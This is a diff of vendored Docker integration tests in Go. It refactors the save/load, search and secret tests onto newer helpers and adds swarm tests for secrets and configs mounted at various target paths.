a/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_test.go index 70139a59bc..688eac684e 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_test.go @@ -1,8 +1,10 @@ package main import ( + "archive/tar" "encoding/json" "fmt" + "io" 
"io/ioutil" "os" "os/exec" @@ -13,9 +15,11 @@ import ( "strings" "time" - "github.com/docker/distribution/digest" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli/build" "github.com/go-check/check" + "github.com/opencontainers/go-digest" + "gotest.tools/icmd" ) // save a repo using gz compression and try to load it using stdout @@ -29,17 +33,19 @@ func (s *DockerSuite) TestSaveXzAndLoadRepoStdout(c *check.C) { dockerCmd(c, "inspect", repoName) - repoTarball, _, err := runCommandPipelineWithOutput( + repoTarball, err := RunCommandPipelineWithOutput( exec.Command(dockerBinary, "save", repoName), exec.Command("xz", "-c"), exec.Command("gzip", "-c")) c.Assert(err, checker.IsNil, check.Commentf("failed to save repo: %v %v", out, err)) deleteImages(repoName) - loadCmd := exec.Command(dockerBinary, "load") - loadCmd.Stdin = strings.NewReader(repoTarball) - out, _, err = runCommandWithOutput(loadCmd) - c.Assert(err, checker.NotNil, check.Commentf("expected error, but succeeded with no error and output: %v", out)) + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "load"}, + Stdin: strings.NewReader(repoTarball), + }).Assert(c, icmd.Expected{ + ExitCode: 1, + }) after, _, err := dockerCmdWithError("inspect", repoName) c.Assert(err, checker.NotNil, check.Commentf("the repo should not exist: %v", after)) @@ -56,7 +62,7 @@ func (s *DockerSuite) TestSaveXzGzAndLoadRepoStdout(c *check.C) { dockerCmd(c, "inspect", repoName) - out, _, err := runCommandPipelineWithOutput( + out, err := RunCommandPipelineWithOutput( exec.Command(dockerBinary, "save", repoName), exec.Command("xz", "-c"), exec.Command("gzip", "-c")) @@ -64,10 +70,12 @@ func (s *DockerSuite) TestSaveXzGzAndLoadRepoStdout(c *check.C) { deleteImages(repoName) - loadCmd := exec.Command(dockerBinary, "load") - loadCmd.Stdin = strings.NewReader(out) - out, _, err = runCommandWithOutput(loadCmd) - c.Assert(err, 
checker.NotNil, check.Commentf("expected error, but succeeded with no error and output: %v", out)) + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "load"}, + Stdin: strings.NewReader(out), + }).Assert(c, icmd.Expected{ + ExitCode: 1, + }) after, _, err := dockerCmdWithError("inspect", repoName) c.Assert(err, checker.NotNil, check.Commentf("the repo should not exist: %v", after)) @@ -81,7 +89,7 @@ func (s *DockerSuite) TestSaveSingleTag(c *check.C) { out, _ := dockerCmd(c, "images", "-q", "--no-trunc", repoName) cleanedImageID := strings.TrimSpace(out) - out, _, err := runCommandPipelineWithOutput( + out, err := RunCommandPipelineWithOutput( exec.Command(dockerBinary, "save", fmt.Sprintf("%v:latest", repoName)), exec.Command("tar", "t"), exec.Command("grep", "-E", fmt.Sprintf("(^repositories$|%v)", cleanedImageID))) @@ -92,15 +100,15 @@ func (s *DockerSuite) TestSaveCheckTimes(c *check.C) { testRequires(c, DaemonIsLinux) repoName := "busybox:latest" out, _ := dockerCmd(c, "inspect", repoName) - data := []struct { + var data []struct { ID string Created time.Time - }{} + } err := json.Unmarshal([]byte(out), &data) c.Assert(err, checker.IsNil, check.Commentf("failed to marshal from %q: err %v", repoName, err)) c.Assert(len(data), checker.Not(checker.Equals), 0, check.Commentf("failed to marshal the data from %q", repoName)) tarTvTimeFormat := "2006-01-02 15:04" - out, _, err = runCommandPipelineWithOutput( + out, err = RunCommandPipelineWithOutput( exec.Command(dockerBinary, "save", repoName), exec.Command("tar", "tv"), exec.Command("grep", "-E", fmt.Sprintf("%s %s", data[0].Created.Format(tarTvTimeFormat), digest.Digest(data[0].ID).Hex()))) @@ -158,7 +166,7 @@ func (s *DockerSuite) TestSaveAndLoadRepoFlags(c *check.C) { before, _ := dockerCmd(c, "inspect", repoName) - out, _, err := runCommandPipelineWithOutput( + out, err := RunCommandPipelineWithOutput( exec.Command(dockerBinary, "save", repoName), exec.Command(dockerBinary, "load")) c.Assert(err, 
checker.IsNil, check.Commentf("failed to save and load repo: %s, %v", out, err)) @@ -187,7 +195,7 @@ func (s *DockerSuite) TestSaveMultipleNames(c *check.C) { // Make two images dockerCmd(c, "tag", "emptyfs:latest", fmt.Sprintf("%v-two:latest", repoName)) - out, _, err := runCommandPipelineWithOutput( + out, err := RunCommandPipelineWithOutput( exec.Command(dockerBinary, "save", fmt.Sprintf("%v-one", repoName), fmt.Sprintf("%v-two:latest", repoName)), exec.Command("tar", "xO", "repositories"), exec.Command("grep", "-q", "-E", "(-one|-two)"), @@ -219,7 +227,7 @@ func (s *DockerSuite) TestSaveRepoWithMultipleImages(c *check.C) { deleteImages(repoName) // create the archive - out, _, err := runCommandPipelineWithOutput( + out, err := RunCommandPipelineWithOutput( exec.Command(dockerBinary, "save", repoName, "busybox:latest"), exec.Command("tar", "t")) c.Assert(err, checker.IsNil, check.Commentf("failed to save multiple images: %s, %v", out, err)) @@ -259,14 +267,11 @@ func (s *DockerSuite) TestSaveDirectoryPermissions(c *check.C) { os.Mkdir(extractionDirectory, 0777) defer os.RemoveAll(tmpDir) - _, err = buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox RUN adduser -D user && mkdir -p /opt/a/b && chown -R user:user /opt/a - RUN touch /opt/a/b/c && chown user:user /opt/a/b/c`, - true) - c.Assert(err, checker.IsNil, check.Commentf("%v", err)) + RUN touch /opt/a/b/c && chown user:user /opt/a/b/c`)) - out, _, err := runCommandPipelineWithOutput( + out, err := RunCommandPipelineWithOutput( exec.Command(dockerBinary, "save", name), exec.Command("tar", "-xf", "-", "-C", extractionDirectory), ) @@ -304,13 +309,32 @@ func (s *DockerSuite) TestSaveDirectoryPermissions(c *check.C) { } +func listTar(f io.Reader) ([]string, error) { + tr := tar.NewReader(f) + var entries []string + + for { + th, err := tr.Next() + if err == io.EOF { + // end of tar archive + return entries, nil + } + if err != nil { + return entries, err + } + 
entries = append(entries, th.Name) + } +} + // Test loading a weird image where one of the layers is of zero size. // The layer.tar file is actually zero bytes, no padding or anything else. // See issue: 18170 func (s *DockerSuite) TestLoadZeroSizeLayer(c *check.C) { - testRequires(c, DaemonIsLinux) + // this will definitely not work if using remote daemon + // very weird test + testRequires(c, DaemonIsLinux, SameHostDaemon) - dockerCmd(c, "load", "-i", "fixtures/load/emptyLayer.tar") + dockerCmd(c, "load", "-i", "testdata/emptyLayer.tar") } func (s *DockerSuite) TestSaveLoadParents(c *check.C) { @@ -357,13 +381,11 @@ func (s *DockerSuite) TestSaveLoadNoTag(c *check.C) { name := "saveloadnotag" - _, err := buildImage(name, "FROM busybox\nENV foo=bar", true) - c.Assert(err, checker.IsNil, check.Commentf("%v", err)) - + buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nENV foo=bar")) id := inspectField(c, name, "Id") // Test to make sure that save w/o name just shows imageID during load - out, _, err := runCommandPipelineWithOutput( + out, err := RunCommandPipelineWithOutput( exec.Command(dockerBinary, "save", id), exec.Command(dockerBinary, "load")) c.Assert(err, checker.IsNil, check.Commentf("failed to save and load repo: %s, %v", out, err)) @@ -374,7 +396,7 @@ func (s *DockerSuite) TestSaveLoadNoTag(c *check.C) { c.Assert(out, checker.Contains, id) // Test to make sure that save by name shows that name during load - out, _, err = runCommandPipelineWithOutput( + out, err = RunCommandPipelineWithOutput( exec.Command(dockerBinary, "save", name), exec.Command(dockerBinary, "load")) c.Assert(err, checker.IsNil, check.Commentf("failed to save and load repo: %s, %v", out, err)) diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_unix_test.go index 22445e5bbe..da520e41c0 100644 --- 
a/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_unix_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_unix_test.go @@ -11,9 +11,11 @@ import ( "strings" "time" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli/build" "github.com/go-check/check" "github.com/kr/pty" + "gotest.tools/icmd" ) // save a repo and try to load it using stdout @@ -29,11 +31,10 @@ func (s *DockerSuite) TestSaveAndLoadRepoStdout(c *check.C) { c.Assert(err, check.IsNil) defer os.Remove(tmpFile.Name()) - saveCmd := exec.Command(dockerBinary, "save", repoName) - saveCmd.Stdout = tmpFile - - _, err = runCommand(saveCmd) - c.Assert(err, check.IsNil) + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "save", repoName}, + Stdout: tmpFile, + }).Assert(c, icmd.Success) tmpFile, err = os.Open(tmpFile.Name()) c.Assert(err, check.IsNil) @@ -41,11 +42,10 @@ func (s *DockerSuite) TestSaveAndLoadRepoStdout(c *check.C) { deleteImages(repoName) - loadCmd := exec.Command(dockerBinary, "load") - loadCmd.Stdin = tmpFile - - out, _, err := runCommandWithOutput(loadCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "load"}, + Stdin: tmpFile, + }).Assert(c, icmd.Success) after := inspectField(c, repoName, "Id") after = strings.TrimRight(after, "\n") @@ -67,16 +67,14 @@ func (s *DockerSuite) TestSaveAndLoadRepoStdout(c *check.C) { n, err := pty.Read(buf) c.Assert(err, check.IsNil) //could not read tty output - c.Assert(string(buf[:n]), checker.Contains, "Cowardly refusing", check.Commentf("help output is not being yielded", out)) + c.Assert(string(buf[:n]), checker.Contains, "cowardly refusing", check.Commentf("help output is not being yielded")) } func (s *DockerSuite) TestSaveAndLoadWithProgressBar(c *check.C) { name := "test-load" - _, err := buildImage(name, ` - FROM busybox + 
buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox RUN touch aa - `, true) - c.Assert(err, check.IsNil) + `)) tmptar := name + ".tar" dockerCmd(c, "save", "-o", tmptar, name) diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_search_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_search_test.go index 5a32f2ab93..2c3312d9e9 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_search_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_search_test.go @@ -4,7 +4,7 @@ import ( "fmt" "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) @@ -122,10 +122,10 @@ func (s *DockerSuite) TestSearchWithLimit(c *check.C) { c.Assert(outSlice, checker.HasLen, limit+2) // 1 header, 1 carriage return limit = 0 - out, _, err = dockerCmdWithError("search", fmt.Sprintf("--limit=%d", limit), "docker") + _, _, err = dockerCmdWithError("search", fmt.Sprintf("--limit=%d", limit), "docker") c.Assert(err, checker.Not(checker.IsNil)) limit = 200 - out, _, err = dockerCmdWithError("search", fmt.Sprintf("--limit=%d", limit), "docker") + _, _, err = dockerCmdWithError("search", fmt.Sprintf("--limit=%d", limit), "docker") c.Assert(err, checker.Not(checker.IsNil)) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_create_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_create_test.go index b79fdbeb59..a807e4e7e7 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_create_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_create_test.go @@ -8,67 +8,28 @@ import ( "strings" "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) -func (s *DockerSwarmSuite) TestSecretCreate(c *check.C) 
{ - d := s.AddDaemon(c, true, true) - - testName := "test_secret" - id := d.createSecret(c, swarm.SecretSpec{ - swarm.Annotations{ - Name: testName, - }, - []byte("TESTINGDATA"), - }) - c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) - - secret := d.getSecret(c, id) - c.Assert(secret.Spec.Name, checker.Equals, testName) -} - -func (s *DockerSwarmSuite) TestSecretCreateWithLabels(c *check.C) { - d := s.AddDaemon(c, true, true) - - testName := "test_secret" - id := d.createSecret(c, swarm.SecretSpec{ - swarm.Annotations{ - Name: testName, - Labels: map[string]string{ - "key1": "value1", - "key2": "value2", - }, - }, - []byte("TESTINGDATA"), - }) - c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) - - secret := d.getSecret(c, id) - c.Assert(secret.Spec.Name, checker.Equals, testName) - c.Assert(len(secret.Spec.Labels), checker.Equals, 2) - c.Assert(secret.Spec.Labels["key1"], checker.Equals, "value1") - c.Assert(secret.Spec.Labels["key2"], checker.Equals, "value2") -} - // Test case for 28884 func (s *DockerSwarmSuite) TestSecretCreateResolve(c *check.C) { d := s.AddDaemon(c, true, true) - name := "foo" - id := d.createSecret(c, swarm.SecretSpec{ - swarm.Annotations{ + name := "test_secret" + id := d.CreateSecret(c, swarm.SecretSpec{ + Annotations: swarm.Annotations{ Name: name, }, - []byte("foo"), + Data: []byte("foo"), }) c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) - fake := d.createSecret(c, swarm.SecretSpec{ - swarm.Annotations{ + fake := d.CreateSecret(c, swarm.SecretSpec{ + Annotations: swarm.Annotations{ Name: id, }, - []byte("fake foo"), + Data: []byte("fake foo"), }) c.Assert(fake, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", fake)) @@ -101,7 +62,7 @@ func (s *DockerSwarmSuite) TestSecretCreateResolve(c *check.C) { // Remove based on ID prefix of the fake one should succeed out, err = d.Cmd("secret", "rm", fake[:5]) - c.Assert(out, 
checker.Contains, fake) + c.Assert(out, checker.Contains, fake[:5]) out, err = d.Cmd("secret", "ls") c.Assert(err, checker.IsNil) c.Assert(out, checker.Not(checker.Contains), name) @@ -126,6 +87,6 @@ func (s *DockerSwarmSuite) TestSecretCreateWithFile(c *check.C) { c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "", check.Commentf(out)) id := strings.TrimSpace(out) - secret := d.getSecret(c, id) + secret := d.GetSecret(c, id) c.Assert(secret.Spec.Name, checker.Equals, testName) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_inspect_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_inspect_test.go deleted file mode 100644 index 0985a2bd59..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_inspect_test.go +++ /dev/null @@ -1,68 +0,0 @@ -// +build !windows - -package main - -import ( - "encoding/json" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSwarmSuite) TestSecretInspect(c *check.C) { - d := s.AddDaemon(c, true, true) - - testName := "test_secret" - id := d.createSecret(c, swarm.SecretSpec{ - swarm.Annotations{ - Name: testName, - }, - []byte("TESTINGDATA"), - }) - c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) - - secret := d.getSecret(c, id) - c.Assert(secret.Spec.Name, checker.Equals, testName) - - out, err := d.Cmd("secret", "inspect", testName) - c.Assert(err, checker.IsNil, check.Commentf(out)) - - var secrets []swarm.Secret - c.Assert(json.Unmarshal([]byte(out), &secrets), checker.IsNil) - c.Assert(secrets, checker.HasLen, 1) -} - -func (s *DockerSwarmSuite) TestSecretInspectMultiple(c *check.C) { - d := s.AddDaemon(c, true, true) - - testNames := []string{ - "test0", - "test1", - } - for _, n := range testNames { - id := d.createSecret(c, swarm.SecretSpec{ - swarm.Annotations{ - Name: n, - }, - 
[]byte("TESTINGDATA"), - }) - c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) - - secret := d.getSecret(c, id) - c.Assert(secret.Spec.Name, checker.Equals, n) - - } - - args := []string{ - "secret", - "inspect", - } - args = append(args, testNames...) - out, err := d.Cmd(args...) - c.Assert(err, checker.IsNil, check.Commentf(out)) - - var secrets []swarm.Secret - c.Assert(json.Unmarshal([]byte(out), &secrets), checker.IsNil) - c.Assert(secrets, checker.HasLen, 2) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_create_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_create_test.go index 9e8b1e9956..d690b7e45f 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_create_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_create_test.go @@ -5,33 +5,34 @@ package main import ( "encoding/json" "fmt" + "path/filepath" "strings" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/mount" "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) func (s *DockerSwarmSuite) TestServiceCreateMountVolume(c *check.C) { d := s.AddDaemon(c, true, true) - out, err := d.Cmd("service", "create", "--mount", "type=volume,source=foo,target=/foo,volume-nocopy", "busybox", "top") + out, err := d.Cmd("service", "create", "--no-resolve-image", "--detach=true", "--mount", "type=volume,source=foo,target=/foo,volume-nocopy", "busybox", "top") c.Assert(err, checker.IsNil, check.Commentf(out)) id := strings.TrimSpace(out) var tasks []swarm.Task waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - tasks = d.getServiceTasks(c, id) + tasks = d.GetServiceTasks(c, id) return len(tasks) > 0, nil }, checker.Equals, true) task := tasks[0] waitAndAssert(c, 
defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - if task.NodeID == "" || task.Status.ContainerStatus.ContainerID == "" { - task = d.getTask(c, task.ID) + if task.NodeID == "" || task.Status.ContainerStatus == nil { + task = d.GetTask(c, task.ID) } - return task.NodeID != "" && task.Status.ContainerStatus.ContainerID != "", nil + return task.NodeID != "" && task.Status.ContainerStatus != nil, nil }, checker.Equals, true) // check container mount config @@ -67,15 +68,15 @@ func (s *DockerSwarmSuite) TestServiceCreateWithSecretSimple(c *check.C) { serviceName := "test-service-secret" testName := "test_secret" - id := d.createSecret(c, swarm.SecretSpec{ - swarm.Annotations{ + id := d.CreateSecret(c, swarm.SecretSpec{ + Annotations: swarm.Annotations{ Name: testName, }, - []byte("TESTINGDATA"), + Data: []byte("TESTINGDATA"), }) c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) - out, err := d.Cmd("service", "create", "--name", serviceName, "--secret", testName, "busybox", "top") + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", serviceName, "--secret", testName, "busybox", "top") c.Assert(err, checker.IsNil, check.Commentf(out)) out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", serviceName) @@ -90,23 +91,91 @@ func (s *DockerSwarmSuite) TestServiceCreateWithSecretSimple(c *check.C) { c.Assert(refs[0].File.Name, checker.Equals, testName) c.Assert(refs[0].File.UID, checker.Equals, "0") c.Assert(refs[0].File.GID, checker.Equals, "0") + + out, err = d.Cmd("service", "rm", serviceName) + c.Assert(err, checker.IsNil, check.Commentf(out)) + d.DeleteSecret(c, testName) } -func (s *DockerSwarmSuite) TestServiceCreateWithSecretSourceTarget(c *check.C) { +func (s *DockerSwarmSuite) TestServiceCreateWithSecretSourceTargetPaths(c *check.C) { d := s.AddDaemon(c, true, true) - serviceName := "test-service-secret" - testName 
:= "test_secret" - id := d.createSecret(c, swarm.SecretSpec{ - swarm.Annotations{ - Name: testName, + testPaths := map[string]string{ + "app": "/etc/secret", + "test_secret": "test_secret", + "relative_secret": "relative/secret", + "escapes_in_container": "../secret", + } + + var secretFlags []string + + for testName, testTarget := range testPaths { + id := d.CreateSecret(c, swarm.SecretSpec{ + Annotations: swarm.Annotations{ + Name: testName, + }, + Data: []byte("TESTINGDATA " + testName + " " + testTarget), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + + secretFlags = append(secretFlags, "--secret", fmt.Sprintf("source=%s,target=%s", testName, testTarget)) + } + + serviceName := "svc" + serviceCmd := []string{"service", "create", "--detach", "--no-resolve-image", "--name", serviceName} + serviceCmd = append(serviceCmd, secretFlags...) + serviceCmd = append(serviceCmd, "busybox", "top") + out, err := d.Cmd(serviceCmd...) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", serviceName) + c.Assert(err, checker.IsNil) + + var refs []swarm.SecretReference + c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) + c.Assert(refs, checker.HasLen, len(testPaths)) + + var tasks []swarm.Task + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + tasks = d.GetServiceTasks(c, serviceName) + return len(tasks) > 0, nil + }, checker.Equals, true) + + task := tasks[0] + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + if task.NodeID == "" || task.Status.ContainerStatus == nil { + task = d.GetTask(c, task.ID) + } + return task.NodeID != "" && task.Status.ContainerStatus != nil, nil + }, checker.Equals, true) + + for testName, testTarget := range testPaths { + path := testTarget + if !filepath.IsAbs(path) { + path = 
filepath.Join("/run/secrets", path) + } + out, err := d.Cmd("exec", task.Status.ContainerStatus.ContainerID, "cat", path) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Equals, "TESTINGDATA "+testName+" "+testTarget) + } + + out, err = d.Cmd("service", "rm", serviceName) + c.Assert(err, checker.IsNil, check.Commentf(out)) +} + +func (s *DockerSwarmSuite) TestServiceCreateWithSecretReferencedTwice(c *check.C) { + d := s.AddDaemon(c, true, true) + + id := d.CreateSecret(c, swarm.SecretSpec{ + Annotations: swarm.Annotations{ + Name: "mysecret", }, - []byte("TESTINGDATA"), + Data: []byte("TESTINGDATA"), }) c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) - testTarget := "testing" - out, err := d.Cmd("service", "create", "--name", serviceName, "--secret", fmt.Sprintf("source=%s,target=%s", testName, testTarget), "busybox", "top") + serviceName := "svc" + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", serviceName, "--secret", "source=mysecret,target=target1", "--secret", "source=mysecret,target=target2", "busybox", "top") c.Assert(err, checker.IsNil, check.Commentf(out)) out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", serviceName) @@ -114,31 +183,199 @@ func (s *DockerSwarmSuite) TestServiceCreateWithSecretSourceTarget(c *check.C) { var refs []swarm.SecretReference c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) + c.Assert(refs, checker.HasLen, 2) + + var tasks []swarm.Task + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + tasks = d.GetServiceTasks(c, serviceName) + return len(tasks) > 0, nil + }, checker.Equals, true) + + task := tasks[0] + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + if task.NodeID == "" || task.Status.ContainerStatus == nil { + task = d.GetTask(c, task.ID) + } + return task.NodeID != "" && 
task.Status.ContainerStatus != nil, nil + }, checker.Equals, true) + + for _, target := range []string{"target1", "target2"} { + c.Assert(err, checker.IsNil, check.Commentf(out)) + path := filepath.Join("/run/secrets", target) + out, err := d.Cmd("exec", task.Status.ContainerStatus.ContainerID, "cat", path) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Equals, "TESTINGDATA") + } + + out, err = d.Cmd("service", "rm", serviceName) + c.Assert(err, checker.IsNil, check.Commentf(out)) +} + +func (s *DockerSwarmSuite) TestServiceCreateWithConfigSimple(c *check.C) { + d := s.AddDaemon(c, true, true) + + serviceName := "test-service-config" + testName := "test_config" + id := d.CreateConfig(c, swarm.ConfigSpec{ + Annotations: swarm.Annotations{ + Name: testName, + }, + Data: []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("configs: %s", id)) + + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", serviceName, "--config", testName, "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Configs }}", serviceName) + c.Assert(err, checker.IsNil) + + var refs []swarm.ConfigReference + c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) c.Assert(refs, checker.HasLen, 1) - c.Assert(refs[0].SecretName, checker.Equals, testName) + c.Assert(refs[0].ConfigName, checker.Equals, testName) c.Assert(refs[0].File, checker.Not(checker.IsNil)) - c.Assert(refs[0].File.Name, checker.Equals, testTarget) + c.Assert(refs[0].File.Name, checker.Equals, testName) + c.Assert(refs[0].File.UID, checker.Equals, "0") + c.Assert(refs[0].File.GID, checker.Equals, "0") + + out, err = d.Cmd("service", "rm", serviceName) + c.Assert(err, checker.IsNil, check.Commentf(out)) + d.DeleteConfig(c, testName) +} + +func (s *DockerSwarmSuite) TestServiceCreateWithConfigSourceTargetPaths(c *check.C) { + d := 
s.AddDaemon(c, true, true) + + testPaths := map[string]string{ + "app": "/etc/config", + "test_config": "test_config", + "relative_config": "relative/config", + } + + var configFlags []string + + for testName, testTarget := range testPaths { + id := d.CreateConfig(c, swarm.ConfigSpec{ + Annotations: swarm.Annotations{ + Name: testName, + }, + Data: []byte("TESTINGDATA " + testName + " " + testTarget), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("configs: %s", id)) + + configFlags = append(configFlags, "--config", fmt.Sprintf("source=%s,target=%s", testName, testTarget)) + } + + serviceName := "svc" + serviceCmd := []string{"service", "create", "--detach", "--no-resolve-image", "--name", serviceName} + serviceCmd = append(serviceCmd, configFlags...) + serviceCmd = append(serviceCmd, "busybox", "top") + out, err := d.Cmd(serviceCmd...) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Configs }}", serviceName) + c.Assert(err, checker.IsNil) + + var refs []swarm.ConfigReference + c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) + c.Assert(refs, checker.HasLen, len(testPaths)) + + var tasks []swarm.Task + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + tasks = d.GetServiceTasks(c, serviceName) + return len(tasks) > 0, nil + }, checker.Equals, true) + + task := tasks[0] + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + if task.NodeID == "" || task.Status.ContainerStatus == nil { + task = d.GetTask(c, task.ID) + } + return task.NodeID != "" && task.Status.ContainerStatus != nil, nil + }, checker.Equals, true) + + for testName, testTarget := range testPaths { + path := testTarget + if !filepath.IsAbs(path) { + path = filepath.Join("/", path) + } + out, err := d.Cmd("exec", task.Status.ContainerStatus.ContainerID, "cat", path) 
+ c.Assert(err, checker.IsNil) + c.Assert(out, checker.Equals, "TESTINGDATA "+testName+" "+testTarget) + } + + out, err = d.Cmd("service", "rm", serviceName) + c.Assert(err, checker.IsNil, check.Commentf(out)) +} + +func (s *DockerSwarmSuite) TestServiceCreateWithConfigReferencedTwice(c *check.C) { + d := s.AddDaemon(c, true, true) + + id := d.CreateConfig(c, swarm.ConfigSpec{ + Annotations: swarm.Annotations{ + Name: "myconfig", + }, + Data: []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("configs: %s", id)) + + serviceName := "svc" + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", serviceName, "--config", "source=myconfig,target=target1", "--config", "source=myconfig,target=target2", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Configs }}", serviceName) + c.Assert(err, checker.IsNil) + + var refs []swarm.ConfigReference + c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) + c.Assert(refs, checker.HasLen, 2) + + var tasks []swarm.Task + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + tasks = d.GetServiceTasks(c, serviceName) + return len(tasks) > 0, nil + }, checker.Equals, true) + + task := tasks[0] + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + if task.NodeID == "" || task.Status.ContainerStatus == nil { + task = d.GetTask(c, task.ID) + } + return task.NodeID != "" && task.Status.ContainerStatus != nil, nil + }, checker.Equals, true) + + for _, target := range []string{"target1", "target2"} { + c.Assert(err, checker.IsNil, check.Commentf(out)) + path := filepath.Join("/", target) + out, err := d.Cmd("exec", task.Status.ContainerStatus.ContainerID, "cat", path) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Equals, "TESTINGDATA") + } 
